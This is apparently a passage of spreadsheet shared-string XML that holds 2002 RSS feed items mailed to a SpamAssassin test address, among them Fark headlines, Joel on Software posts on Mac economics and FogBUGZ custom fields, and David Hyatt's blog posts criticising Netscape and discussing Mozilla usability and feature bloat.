    <t>URL: [URL]http://www.newsisfree.com[/URL],8268029,1717/\nDate: 2002-09-26T08:22:40+01:00\n\n[IMG: [URL]http://www.newsisfree.com[/URL] ([AZCentral])]</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: fark &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Thu, 26 Sep 2002 15:28:57 -0000</t>
  </si>
  <si>
    <t>Thu, 26 Sep 2002 15:28:57 -0000</t>
  </si>
  <si>
    <t>Teens videotape themselves shooting stapleguns into their arms</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8269406,1717/\nDate: 2002-09-26T09:23:44+01:00\n\n[IMG: [URL]http://www.newsisfree.com[/URL] ([BostonGlobe])]</t>
  </si>
  <si>
    <t>Photoshop this squirrel tuning in, turning on, and dropping out</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8269407,1717/\nDate: 2002-09-26T09:23:43+01:00\n\n(Some Stoner)</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: fark &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Thu, 26 Sep 2002 15:28:54 -0000</t>
  </si>
  <si>
    <t>Thu, 26 Sep 2002 15:28:54 -0000</t>
  </si>
  <si>
    <t>Condemned man picks a black olive for his last meal. Green olives</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8272608,1717/\nDate: 2002-09-26T11:26:10+01:00\n\n[IMG: [URL]http://www.newsisfree.com[/URL] ([Cleveland])]</t>
  </si>
  <si>
    <t>Friends don't let friends swim drunk. Paging Dr. Darwin..</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8272607,1717/\nDate: 2002-09-26T11:26:11+01:00\n\n(NY Daily News)</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: fark &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Thu, 26 Sep 2002 15:28:52 -0000</t>
  </si>
  <si>
    <t>Thu, 26 Sep 2002 15:28:52 -0000</t>
  </si>
  <si>
    <t>Phoenix Suns owner dons dreadlocks to help sell tickets</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8274142,1717/\nDate: 2002-09-26T12:27:20+01:00\n\n[IMG: [URL]http://www.newsisfree.com[/URL] ([Sports by Brooks])]</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: fark &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Thu, 26 Sep 2002 15:28:47 -0000</t>
  </si>
  <si>
    <t>Thu, 26 Sep 2002 15:28:47 -0000</t>
  </si>
  <si>
    <t>Photoshop the worlds ugliest truck</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8274140,1717/\nDate: 2002-09-26T12:27:22+01:00\n\n(Some Ugly Guy)</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: fark &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Thu, 26 Sep 2002 15:28:45 -0000</t>
  </si>
  <si>
    <t>Thu, 26 Sep 2002 15:28:45 -0000</t>
  </si>
  <si>
    <t>Archaeological finds show that the Incas rode dinosaurs, science</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8279315,1717/\nDate: 2002-09-26T15:30:15+01:00\n\n(creationists.org)</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: joelonsoftware &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Thu, 26 Sep 2002 15:28:30 -0000</t>
  </si>
  <si>
    <t>Thu, 26 Sep 2002 15:28:30 -0000</t>
  </si>
  <si>
    <t>Daniel Berlinger has noticed that Mac software shops are starting</t>
  </si>
  <si>
    <t>URL: [URL]http://www.joelonsoftware.com[/URL]\nDate: Not supplied\n\nDaniel Berlinger has noticed[1] that Mac software shops are starting to move to \nOS X-only development. This makes sense, for two reasons. First, most people \nwho pay for software have new computers. So while OS X may only have a small \nfraction of the installed base, it has the majority of the population of people \nwho are opening their wallets. Second, if OS X isn't successful, the Mac is _\nover_. It's not like System 9 is getting any more popular. \n\nThen again, there are very few conditions under which it is actually the right \nbusiness decision to develop software for the Macintosh. Developing for the Mac \nis not a whole lot different than creating a web site _that only works on \nNetscape_. (Given the market share of Macs[2] (about 3.5%) and the market share \nof Netscape[3] (about 3.4%), that is not a silly comparison.) \n\nRobb Beal wrote[4]: "Try this test. Go to a venture firm, angel, or big company \nwith a Mac OS X product/concept/prototype. Do they consider the fact that it's \na Mac application a net plus? (No.)" Well _duh_. Your product would have to \nappeal to _25 times more Mac _users_ _[as a percentage] than Windows users just \nto break even. In other words, if your Windows product appeals to 1 in 100 \nWindows users, you have to appeal to 25 in 100 Mac users to make the same \namount of money. \n\nNow, you may want to make an _emotional_ appeal to developing for the Mac. \nThat's fine. If you like Macs and you're doing it for fun, more power to ya. \n\nBut as long as we're talking _investment_, you have to tell me why you're going \nto get 25 times as many users. Maybe there's less competition in your category \non the Mac; maybe you're in a niche like graphics where it seems like Macs \ndominate (they don't, it just seems that way because the elite graphics people \nin big American cities use Macs); maybe your product can't sell to mixed \nenvironments unless it runs everywhere. But if you want to make an investment \nin Mac software be prepared to demonstrate how you're going to overcome that \nmagic 25 multiplier.\n\n[1] [URL]http://archipelago.phrasewise.com[/URL]\n[2] [URL]http://maccentral.macworld.com[/URL]\n[3] [URL]http://websidestory.com[/URL]\n[4] [URL]http://radio.weblogs.com[/URL]</t>
  </si>
  <si>
    <t>http://www.joelonsoftware.com http://archipelago.phrasewise.com http://maccentral.macworld.com http://websidestory.com http://radio.weblogs.com</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: joelonsoftware &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Thu, 26 Sep 2002 15:28:28 -0000</t>
  </si>
  <si>
    <t>Thu, 26 Sep 2002 15:28:28 -0000</t>
  </si>
  <si>
    <t>We're trying to decide if FogBUGZ 3.0 should support custom</t>
  </si>
  <si>
    <t>URL: [URL]http://www.joelonsoftware.com[/URL]\nDate: Not supplied\n\nWe're trying to decide if FogBUGZ[1] 3.0 should support custom fields. \nHistorically, I am opposed to custom fields in principle, because they get \nabused. People add so many fields to their bug databases to capture everything \nthey think might be important that entering a bug is like applying to Harvard. \nEnd result: people don't enter bugs, which is much, much worse than not \ncapturing all that information. You can always "page fault" to get the \ninformation if the original report forgot it. Rather than having a field in \nevery bug where you enter the version numbers of every DLL on your machine \n(this is an actual customer request), information which is likely to be \nrelevant only for a tiny percentage of bugs, why not just have the \nprogrammer-assignee look at the bug first, and if they think it might be \ndll-version-related, only _then_ bounce the bug back to the originator asking \nfor the DLL info? Similarly, it's always tempting to add a field in which you \nask for the OS version in which the bug occurred. This sounds logical, but \ntrust me: adding fields like this is guaranteed to do one thing and one thing \nonly: reduce the number of bug reports that get into the system in the first \nplace. Only a small percentage of bugs are really OS dependant and you can \nalways include that info in the text description of the bug if it happens to be \nrelevant. (But then how do you search for, say, all bugs which only happen on \nWindows 98SE? Aha! You can't. Ever. Even with the custom field. Because not \nevery bug has been regressed on every version of every operating system, so \nthis search doesn't make sense in the first place. The info wasn't captured. Do \na full text search for 98SE and you'll find some of them. Life is imperfect.) \n\nLife would be more perfect if every bug report included megabytes of \ninformation -- a complete dump of every byte on the hard drive and in RAM on \nthe computer in question and while you're at it, a photograph of the tester's \nworkspace. But the goal of a bug tracking database is to _keep track of bugs_, \nwhich, all else being equal, takes priority over making it easy to find them. I \nhave heard countless stories of development teams where the bug tracking \npackage was so high-ceremony that people were afraid to enter bugs in the \nsystem, because they didn't know what all those fields were. The _real_ \nbug-"tracking" happened in email, post-its, and hallway conversations. Great. \n\nA pretty common question we get on the customer service line is, "does \nFogBUGZ support custom fields?" Rather than giving our usual answer ("no. on \npurpose.") over the last few weeks I've been saying, "can you please tell me \nwhat fields you would need? We're trying to decide whether to implement that \nfeature in 3.0 and we want to know why people need it." The interesting thing \nis, almost all of the fields people ask for _are already in FogBUGZ,_ and the \nother ones, in my educated opinion, shouldn't be fields. And in fact, our \nexisting customers are certainly happy without custom fields. One of our \nbiggest site licenses was sold to a semiconductor company, and I myself wanted \nto add a custom field for them to keep track of versions of the circuit design, \nbut I didn't, and they never needed it (even though they had been keeping track \nof it with the old bug tracking package which had custom fields), and they are \nhappy and keep buying more site licenses. \n\nBut the dilemma for us is that many customers are evaluating bug tracking \nsoftware and they consider the lack of custom fields to be a major weakness in \nour product. "Gosh, even Filemaker has custom fields." Righto. It's true. And \nwho am I to tell my customers they are wrong? One person who I was talking to \nyesterday would have used a custom field for something that we already have a \nbuilt-in field for. This would have made their database confusing and \ninconsistent and would have definitely caused more problems than it solved. But \nit's still rude of me to tell customers that we don't have that feature _for \ntheir own good_, even though it usually is, and we're losing some sales because \nof it. \n\nSigh. I guess we could have a custom fields feature but hide it and make it so \nhard to use that people don't use it. At least we won't lose any sales :)\n\n[1] [URL]http://www.fogcreek.com[/URL]</t>
  </si>
  <si>
    <t>http://www.joelonsoftware.com http://www.fogcreek.com</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: joelonsoftware &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Thu, 26 Sep 2002 15:28:26 -0000</t>
  </si>
  <si>
    <t>Thu, 26 Sep 2002 15:28:26 -0000</t>
  </si>
  <si>
    <t>John Robb has an interesting perspective on trust-based,</t>
  </si>
  <si>
    <t>URL: [URL]http://www.joelonsoftware.com[/URL]\nDate: Not supplied\n\nJohn Robb has an interesting perspective on trust-based, targetted advertising\n[1] based on his experiences at Gomez during the heady days of the Internet \ngold rush. \n\nNobody believes advertisements[2] any more. There's a lot of evidence that \nadvertising just doesn't work, no matter how targetted, so if you have a \nproduct to sell you have no choice but to get into the editorial side, where \nconsumers' defenses are lowered. Product placements are one example of this. \n\nThere is an unfortunate tragedy of the commons, here. When advertising first \nrose to prominence, advertisements _did_ work. We hadn't built up our \nimmunities yet. As more and more advertisers used the opportunity of the medium \nto lie, we learned not to trust advertisements. But we still trust editorial. \nAnd once editorial gets polluted by desperate marketers using PR instead \nof advertising to promote their message, nobody will believe it either.\n\n[1] [URL]http://jrobb.userland.com[/URL]\n[2] [URL]http://www.amazon.com[/URL]</t>
  </si>
  <si>
    <t>http://www.joelonsoftware.com http://jrobb.userland.com http://www.amazon.com</t>
  </si>
  <si>
    <t>Jakob Nielsen on Offshore Usability: "To save costs, some</t>
  </si>
  <si>
    <t>URL: [URL]http://www.joelonsoftware.com[/URL]\nDate: Not supplied\n\nJakob Nielsen on Offshore Usability[1]: "To save costs, some companies are \noutsourcing Web projects to countries with cheap labor. Unfortunately, these \ncountries lack strong usability traditions and their developers have limited \naccess -- if any -- to good usability data from the target users." \n\nOffshore usability is a specific case of the general "offshore design" problem. \nPut simply, software teams are not successful when \ndesign or management are done in a different physical location than \nprogramming. Once I actually had a job where I was in New York, my direct \nmanager was in Singapore, _his_ manager was in Hyderabad, and if I needed \nany management input I had literally no choice but to go to the CEO because at \nleast he was awake during the same hours as I was. You can't get things done \nlike this. A good project team relies on hundreds of small interactions a day. \nHere in the Fog Creek offices, we have 10 small conversations about FogBUGZ 3.0 \ndevelopment every day. \n\nWhat I don't understand is people who think it's OK to move the developers ten \ntime zones away from their managers and expect good results. Those same people \nwould scream bloody murder if you told them that you were going to \nsend the whole _management_ team to Bangalore or Beijing.\n\n[1] [URL]http://www.useit.com[/URL]</t>
  </si>
  <si>
    <t>http://www.joelonsoftware.com http://www.useit.com</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: joelonsoftware &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Thu, 26 Sep 2002 15:28:22 -0000</t>
  </si>
  <si>
    <t>Thu, 26 Sep 2002 15:28:22 -0000</t>
  </si>
  <si>
    <t>Eddie Kessler describes programming at Napster. Ray Ozzie has</t>
  </si>
  <si>
    <t>URL: [URL]http://www.joelonsoftware.com[/URL]\nDate: Not supplied\n\nEddie Kessler describes programming at Napster[1]. \n\nRay Ozzie has more on platforms[2]. "Finding the 'right' price point for a \nsoftware platform is critical." To me this sounds like a fancy way of saying, \n"I groove all that stuff about how platforms need to be cheap and ubiquitous, \nbut I can't bring myself to do it." The price, Ray says, "must be high enough \nboth 1) to maintain a perception of value in the platform, and 2) to create \nsignificant margins well before ubiquity is assured so that the ecosystem is \nassured of the platform's ultimate viability." What he doesn't mention: if you \nlower the price on the only product you're selling, you have a revenue hit, \nwhich will not make your investors happy, and you may run out of money and have \nto close. But that must be what he's thinking.\n\n[1] [URL]http://www.joelonsoftware.com[/URL]\n[2] [URL]http://www.ozzie.net[/URL]</t>
  </si>
  <si>
    <t>http://www.joelonsoftware.com http://www.joelonsoftware.com http://www.ozzie.net</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: boingboing &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Thu, 26 Sep 2002 15:28:11 -0000</t>
  </si>
  <si>
    <t>Thu, 26 Sep 2002 15:28:11 -0000</t>
  </si>
  <si>
    <t>Gearheads and bunnyhuggers in the OED</t>
  </si>
  <si>
    <t>URL: [URL]http://boingboing.net[/URL]\nDate: Not supplied\n\nSome of the words in the new shorter Oxford English Dictionary: \n\n    Asylum seeker, economic migrant, bed-blocking, and stakeholder pension \n    reflect the serious side of life; bunny-hugger (a conservationist or animal \n    lover), chick flick (a film appealing to women), gearhead (a car \n    enthusiast), and Grinch (a spoilsport or killjoy) are entries in a more \n    light-hearted vein. Several entries are testaments to the popularity of \n    science fiction, among them Tardis from the TV series Doctor Who, Jedi from \n    Star Wars, and Klingon from Star Trek.  \n\nLink[1] Discuss[2] (_Thanks, Mark!_)\n\n[1] [URL]http://www.askoxford.com[/URL]\n[2] [URL]http://www.quicktopic.com[/URL]</t>
  </si>
  <si>
    <t>http://boingboing.net http://www.askoxford.com http://www.quicktopic.com</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: boingboing &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Thu, 26 Sep 2002 15:28:10 -0000</t>
  </si>
  <si>
    <t>Thu, 26 Sep 2002 15:28:10 -0000</t>
  </si>
  <si>
    <t>Duct-tapers -- suspension and bondage fetish goes mainstream</t>
  </si>
  <si>
    <t>URL: [URL]http://boingboing.net[/URL]\nDate: Not supplied\n\n[IMG: [URL]http://www.craphound.com[/URL]] Duct-tapers are mainstream \nbondage fetishists who tape each other up to walls and ceilings "just to see if \nit will hold." Pervs. Link[1] Discuss[2] (_Thanks Steve[3]!_) \n\n\n[1] [URL]http://www.octanecreative.com[/URL]\n[2] [URL]http://www.quicktopic.com[/URL]\n[3] [URL]http://www.mindspring.com[/URL]</t>
  </si>
  <si>
    <t>http://boingboing.net http://www.craphound.com http://www.octanecreative.com http://www.quicktopic.com http://www.mindspring.com</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: "hyatt@mozilla" &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Thu, 26 Sep 2002 15:27:52 -0000</t>
  </si>
  <si>
    <t>Thu, 26 Sep 2002 15:27:52 -0000</t>
  </si>
  <si>
    <t>"hyatt@mozilla" &lt;rssfeeds@spamassassin.taint.org&gt;</t>
  </si>
  <si>
    <t>Movie Quiz</t>
  </si>
  <si>
    <t>URL: [URL]http://www.mozillazine.org[/URL]\nDate: Not supplied\n\nTest your knowledge with this set of movie quotes. I'll be back in a couple of \ndays with the answers.\n\n\n-  Did IQs just drop sharply while I was away? \n\n-  Any fool can get into college. Only a select few can say the same about \nAmanda Jones.\n\n-  My dear, since Eve picked the apple, no woman has ever been taken entirely \nunawares.\n\n-  This is Tommy. He tells people he's named after a gun, but I know he's named \nafter a famous 19th century ballerina.\n\n-  When one woman strikes at the heart of another she seldom misses, and the \nwound is invariably fatal.\n\n-  I've never been alone with a man before, even with my dress on. With my \ndress off, it's _most_ unusual.\n\n-  You're nothing to me now. You're not a brother, you're not a friend. I don't \nwant to know you or what you do. I don't want to see you at the hotels, I don't \nwant you near my house. When you see our mother, I want to know a day in \nadvance, so I won't be there.\n\n-  Kids: 10 seconds of joy, 30 years of misery.\n\n-  Sucking all the marrow out of life doesn't mean choking on the bone.\n\n-  A hundred million terrorists in the world and I gotta kill one with feet \nsmaller than my sister.\n\n-  Mother, I do not need a blind date. Particularly not with some verbally \nincontinent spinster who drinks like a fish, smokes like a chimney and dresses \nlike her mother.\n\n-  Have you ever seen a body like this before in your life?\nShe happens to be my daughter.\nOh. Then I guess you have.\n\n-  I'm not a smart man, but I know what love is.\n\n-  Of course, you won't be able to lie on your back for a while but then you \ncan lie from any position, can't you?\n\n-  The fact that you prevented it from happening doesn't change the fact that \nit was going to happen.\n\n-  Women need a reason for having sex. Men just need a place.\n\n-  You are not special. You are not a beautiful or unique snowflake. You are \nthe same decaying organic matter as everything else.\n\n-  Looks like I picked the wrong week to stop sniffing glue! \n\n-  The issue is not whether you are paranoid. Look around you Lenny. The issue \nis whether you are paranoid enough.\n\n-  Inconceivable!\nYou keep using that word. I do not think it means what you think it means. \n\nEnjoy.</t>
  </si>
  <si>
    <t>http://www.mozillazine.org</t>
  </si>
  <si>
    <t>More fun with the PTC</t>
  </si>
  <si>
    <t>URL: [URL]http://www.mozillazine.org[/URL]\nDate: Not supplied\n\nI received some feedback in email (from several of you actually) regarding my \nearlier blog about the Parents Television Council[1], which recently published \na report in which they labeled Buffy as the worst show on television for \nchildren. Let me clarify why this organization bothers me so much.\n\nBuffy as a show is clearly inappropriate for children under 12, and a game like \nGTA3 is as well. The PTC, however, has a clear agenda that goes beyond simply \nwarning parents about the dangers of television shows or video games. There is \na belief on the part of the PTC that the hour from 8-9pm (the first hour of \nprimetime) must be designated a family hour, and that no offensive shows should \nair during that time. I don't believe that it's the networks' responsibility to \nrestrict the kind of content aired during a particular hour of television. The \nshows that air during primetime run the gamut; some are family-oriented and \nsome aren't. There is, however, no shortage of suitable content should parents \nand children wish to watch TV together during this hour.\n\nIt should be the parent's responsibility to police a child's television \nviewing. If you don't want your kids watching _Buffy the Vampire Slayer_, then \ndon't let them, but don't campaign to have the show removed from the air or \nshoved into a late hour that would only result in its cancellation just because \nyou don't like its content. If you don't think a show is appropriate, don't let \nyour kids watch it.\n\nThe PTC also seems to find shows offensive that are family-oriented. An example \nof one such show is _Malcolm in the Middle_. I would hardly call this show \ninappropriate for kids. Apparently the only shows that the PTC deems \nappropriate are those that have been sanitized to match their \nultra-conservative agenda. Even then, I wouldn't really mind, but the idea that \nall other shows must be relegated to some later hour is just ludicrous.\n\n[1] [URL]http://www.parentstv.org[/URL]</t>
  </si>
  <si>
    <t>http://www.mozillazine.org http://www.parentstv.org</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: "hyatt@mozilla" &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Thu, 26 Sep 2002 15:27:49 -0000</t>
  </si>
  <si>
    <t>Thu, 26 Sep 2002 15:27:49 -0000</t>
  </si>
  <si>
    <t>Validation</t>
  </si>
  <si>
    <t>URL: [URL]http://www.mozillazine.org[/URL]\nDate: Not supplied\n\nI feel so tremendously validated right now in all my criticisms of Netscape vs. \nMozilla. I told Netscape management that if the Netscape beta shipped without \npopup blocking that CNet would write an article on it. They didn't believe me \n(or didn't care). Sure enough, the article appeared right on time[1].\n\nI blogged about two main annoyances when installing Netscape 7: the lack of \npopup blocking and all of the annoying advertising spam on the desktop and in \nthe toolbars. I warned Netscape that they needed to take steps to correct this \nproblem. They didn't listen. Take a look at the CNet review[2] highlight that \ndescribes *The Bad* part of Netscape 7.0:\n\n_Displays AOL ads everywhere; doesn't let you turn off pop-up windows like \nMozilla does; devours 30MB of disk space._\n\nPlenty of other engineers at Netscape (as well as managers) complained about \nthese problems and fought with those higher up to correct these problems. We \nlost every battle. The simple truth is that the people in charge of running the \nNetscape browser are incompetent. They don't understand how to make a good \nbrowser, or they don't care. Their engineers tell them what they're doing \nwrong, and they don't listen. \n\nMaybe you'll listen to the public. How about eWeek's article, Netscape 7.0 \nShrivels Under Mozilla's Shadow[3]? Are you paying attention now, you ignorant, \nstupid, incompetent buffoons?\n\n"I told you so." never felt so good.\n\nMaybe they will sit up and take notice now. If they do, well, it's about \nfucking time. And people wonder why I quit working for AOL.\n\n\n[1] [URL]http://news.com.com[/URL]\n[2] [URL]http://www.cnet.com[/URL]\n[3] [URL]http://www.eweek.com[/URL],3959,493248,00.asp</t>
  </si>
  <si>
    <t>http://www.mozillazine.org http://news.com.com http://www.cnet.com http://www.eweek.com</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: "hyatt@mozilla" &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Thu, 26 Sep 2002 15:27:43 -0000</t>
  </si>
  <si>
    <t>Thu, 26 Sep 2002 15:27:43 -0000</t>
  </si>
  <si>
    <t>Thunder Stealing</t>
  </si>
  <si>
    <t>URL: [URL]http://www.mozillazine.org[/URL]\nDate: Not supplied\n\nTony Davis wrote in his blog:\n\n_All Mozilla did is steal Netscape's thunder. _\n\nTrue, but if Netscape had actually bothered to put valuable additions into its \nproduct, then that wouldn't have happened. Similarly, if Netscape hadn't taken \naway valuable features from Mozilla, then maybe people would actually want to \nuse Netscape over Mozilla.</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: "hyatt@mozilla" &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Thu, 26 Sep 2002 15:27:42 -0000</t>
  </si>
  <si>
    <t>Thu, 26 Sep 2002 15:27:42 -0000</t>
  </si>
  <si>
    <t>Usability Problems with Mozilla</t>
  </si>
  <si>
    <t>URL: [URL]http://www.mozillazine.org[/URL]\nDate: Not supplied\n\nBlake blogs[1] about how mpt[2] wants Mozilla to look just like MSIE. I have to \nadmit, the evidence is pretty compelling. I recall someone asking me, "Do you \nreally agree with mpt's Top 10 list? He's quoted you at the top of the list!"\n\nDo I agree that those ten items mpt mentions are the top ten problems? Of \ncourse not. No two people will have the same top ten problems. Also keep in \nmind that mpt and I can agree that something is a problem without necessarily \nagreeing on the solution to the problem. Maybe we have different ideas \nregarding how to solve a particular issue, but we at least both believe it is \nan issue that needs to be addressed. That's something.\n\nTo cover the list specifically:\n\n\n- Navigator chrome structure - While I don't necessarily agree with mpt's \nproposed default configuration, I do agree that the chrome structure is \npainfully restrictive, and that customizable toolbars need to be implemented in \norder for us to acquire the flexibility to deal with this problem.\n\n- Speed - can't argue with this, except to say that cutting out a lot of the \nuseless UI and features from the chrome helps substantially. Reduce bloat, gain \nspeed.\n\n- Text editing - if you use Chimera on the Mac, you'll see that the textfield \nwidget is easily the most painful part of the entire application. It's buggy, \nslow, misbehaves, and doesn't edit the way you'd expect. This is IMO Chimera's \ntop usability problem.\n\n- Message display - Yes. No argument here.\n\n- Search - Yeah, it's a mess. Don't know if it would be in my top ten, but it's \na mess.\n\n- Menu structure - This gets back to my blog about how the apps should be \nseparated. The menu structure has been complicated in order to deal with \nmultiple applications. A clean separation naturally simplifies the menus (e.g., \nyou can eliminate the New submenu easily).\n\n- Migration - A problem, but IMO not one of the top ten facing Mozilla.\n\n- Context menus - mpt complains about two-click context menus, and yet, the OS \ndefault on Win32 (overwhelmingly) is to bring up a context menu on a mouse up. \nIf you don't like it, complain about Win32, but don't cite this as a Mozilla \nusability problem when we're following the conventions of the operating system. \n(We simply listen for the WM_CONTEXTMENU message. That message fires when Win32 \nwants to fire it.)\n\n- Validation - Err, no. Not a usability problem. To the average bear, this is \ncompletely irrelevant.\n\n- Preferences - IMO this should be much higher on the list. Preferences are a \ntangled pathetic mess. Again, separating prefs for individual apps into unique \ndialogs would simplify things a great deal, but we should also remove nearly \nhalf the preferences that exist from the GUI. Mozilla is ridiculously \noverconfigurable.\n\n\n\n[1] [URL]http://www.blakeross.com[/URL]\n[2] [URL]http://mpt.phrasewise.com[/URL]</t>
  </si>
  <si>
    <t>http://www.mozillazine.org http://www.blakeross.com http://mpt.phrasewise.com</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: "hyatt@mozilla" &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Thu, 26 Sep 2002 15:27:41 -0000</t>
  </si>
  <si>
    <t>Thu, 26 Sep 2002 15:27:41 -0000</t>
  </si>
  <si>
    <t>Priceless</t>
  </si>
  <si>
    <t>URL: [URL]http://www.mozillazine.org[/URL]\nDate: Not supplied\n\nI just finished reading an article about Mozilla[1] for Salon.com[2]. This \nexcerpt was rather amusing.\n\n_It is a good question, because in almost every way, Mozilla is a better \nbrowser than Navigator. For example, Netscape's best new feature, tabbed \nbrowsing -- which lets you have several Web pages open in the same browser \nwindow, and allows you to bookmark all the pages under one name -- was in \nMozilla many months ago, and the Mozilla project that created it (called \nMultiZilla) already has an improved version available. When asked about this, \nYecies, of Netscape, said, "That's true, but the engineer who's working on it \n[for Mozilla] is a Netscape employee. It was always done with the intention of \nfostering general browsing usability for Netscape." \n_\nYes, ok, I suppose that's true if by "Netscape employee" you really meant \n"Apple employee." and by "always done with the intention of fostering general \nbrowsing usability for Netscape" you meant "was done in a weekend for Mozilla \nbecause I thought MultiZilla was cool." \n\nHere's how the whole tabbed browsing thing happened. One night I finally \ndownloaded an extension called MultiZilla (go check it out on mozdev.org[3]. I \nwas particularly impressed with a feature contained in MultiZilla called tabbed \nbrowsing. I started doing research and discovered NetCaptor[4], a tabbed \nbrowser that embedded WinIE. \n\nMultiZilla was cool but at the time suffered from two fundamental flaws that \nprevented the code from being incorporated into the Mozilla tree. The first was \na UI flaw, namely that at the time it had ripped off NetCaptor down to the last \ncontext menu item. The GUI was similar enough that there would have been \ndefinite concerns about so obviously copying some of NetCaptor's more obscure \ncapabilities (like sticky names and tab locking). The second concern was that \nthe tab behavior wasn't encapsulated cleanly into a widget. \n\nI produced a simplified version of tabbed browsing on my own time (did it in a \nweekend) that removed some of the geekier NetCaptor features and that \nencapsulated the tab behavior so that the changes to other Navigator files \nwould be minimal. Once I established that it didn't degrade performance in the \nsingle tab case, I checked it in as an experiment.\n\nThe response was overwhelming, as were the bugs that started being filed. So \nmuch so that at first I wanted to back tabbed browsing out of the tree. I was \noverruled by Mozilla, which turned out to be a good thing for all I think. :) \nEven with all the excitement and hoopla surrounding the advent of tabbed \nbrowsing on the engineering side (and in the Mozilla community), Netscape still \ndidn't get it. Netscape marketing prioritized all sorts of useless work that \nnobody had even started above tabbed browsing in their marketing document. They \ncontinued to do so for months, simply not getting it. It was this odd curiosity \nthat one of their engineers had checked in, and they didn't know what to make \nof it.\n\nOnly after the press raved about it did Netscape really jump on board. I'm sure \nNetscape is doing the same thing now with popup blocking. Can't you just see it \nnow? We'll have a Popup Manager, and a Manager to manage the Popup Manager, and \ntwenty-seven preferences for fine-grained control of all aspects of popups. \n\nCan you believe how disfunctional Netscape is? When their engineers say "you \nshould do this" or "you should do that", they get completely ignored (or blown \noff), but when CNet says "We didn't like this, or we didn't like that.", \nNetscape scurries to meet their demands. That is simply pathetic.\n\n[1] [URL]http://archive.salon.com[/URL]\n[2] [URL]http://www.salon.com[/URL]\n[3] [URL]http://www.mozdev.org[/URL]\n[4] [URL]http://www.netcaptor.com[/URL]</t>
  </si>
  <si>
    <t>http://www.mozillazine.org http://archive.salon.com http://www.salon.com http://www.mozdev.org http://www.netcaptor.com</t>
  </si>
  <si>
    <t>A Line in the Sand</t>
  </si>
  <si>
    <t>URL: [URL]http://www.mozillazine.org[/URL]\nDate: Not supplied\n\nBug 22056 has to do with enabling different toolbar modes. It's a pretty basic \nbrowser feature that has been missing from Navigator for years. Even simplified \nbrowsers like Chimera have this feature. Neil did some excellent work in 22056 \nand his code finally landed. It naturally spiked startup time and window time \nslightly, and so it ended up being backed out because of Mozilla's no tolerance \npolicy for regressions.\n\nWhile this "line in the sand" policy is in many ways a good one, I feel like it \nmisses the point. There is a natural tendency when designing applications to \nadd features in every new version of the software. Only rarely do you see \nfeatures removed. With each passing version, you get more and more bloated, \nrelying on faster machines and more memory to save the day. Who cares if the \nuser interface is now full of 3000 menu items? You still support every last \nfeature since version 1.0, so no customers can possibly be dissatisfied!\n\nYou can really only cram so many features into a product before its size \nrequirements and performance requirements have to change. This is an obvious \nrule. It's like you start with an empty elevator that says "Capacity: 10 \npeople." The elevator stops at the first floor (version 1.0) and a bunch of \npeople (features) get on. Continuing on its journey, the elevator stops at the \nsecond floor, and still more people get on. The elevator is now full, and it \ncontinues to the third floor (version 3.0). Unfortunately the elevator is full, \nbut there are a bunch of people waiting at the third floor to get on. Some of \nthem squeeze in anyway, past the fat person from the first floor (the Mozilla \nsidebar feature) who is taking up enough space for 3 people. Everyone wishes \nhe'd get off at the third floor or even the fourth floor, but he doesn't. \nSomeone (the Mozilla wallet feature) from the second floor cuts one on the way \nto the third floor, so he's useless, and everyone wishes he'd get off too. He \ndoesn't though. Nobody does. People keep piling in at floor after floor, until \neventually the elevator support cable snaps and everybody dies.\n\nWe need to forcibly eject people from the elevator. Remove the features that \nnobody wants and replace them with the features that matter. Cull out the \nfeatures that didn't work in Mozilla 1.0 and make sure they aren't there in \nMozilla 2.0. Make more of the features optional plugins so that geeks who want \nsome of the more obscure features (and that have powerhouse machines) can go \ndownload them on their own. Only if we actively fight the trend towards bloat \nwill we finally produce an awesome Mozilla browser.</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: "hyatt@mozilla" &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Thu, 26 Sep 2002 15:27:40 -0000</t>
  </si>
  <si>
    <t>Thu, 26 Sep 2002 15:27:40 -0000</t>
